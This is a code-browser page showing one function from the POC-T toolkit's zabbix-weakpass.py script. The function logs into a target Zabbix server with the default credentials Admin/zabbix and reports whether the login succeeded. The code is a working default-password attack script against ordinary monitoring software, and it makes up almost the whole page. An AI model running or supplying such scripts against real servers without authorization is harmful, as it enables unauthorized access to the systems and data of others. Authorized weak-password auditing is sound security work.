MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/zabbix-weakpass.py:33–64  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

31
32
33def poc(url):
34 if '://' not in url:
35 url = 'http://' + url
36 h1 = {
37 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
38 }
39
40 h2 = {
41 'Referer': url.strip('\n'),
42 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
43 }
44
45 blacklist = [
46 'incorrect',
47 '<!-- Login Form -->',
48
49 ]
50 try:
51 s = requests.session()
52 c = s.get(url, timeout=10, headers=h1)
53 dic = _get_static_post_attr(c.content)
54 dic['name'] = 'Admin'
55 dic['password'] = 'zabbix'
56 r = s.post(url + '/index.php', data=dic, headers=h2, timeout=10)
57 if 'chkbxRange.init();' in r.content:
58 for each in blacklist:
59 if each in r.content:
60 return False
61 return True
62 return False
63 except Exception:
64 return False

Callers

nothing calls this directly

Calls 2

getMethod · 0.80
_get_static_post_attrFunction · 0.70

Tested by

no test coverage detected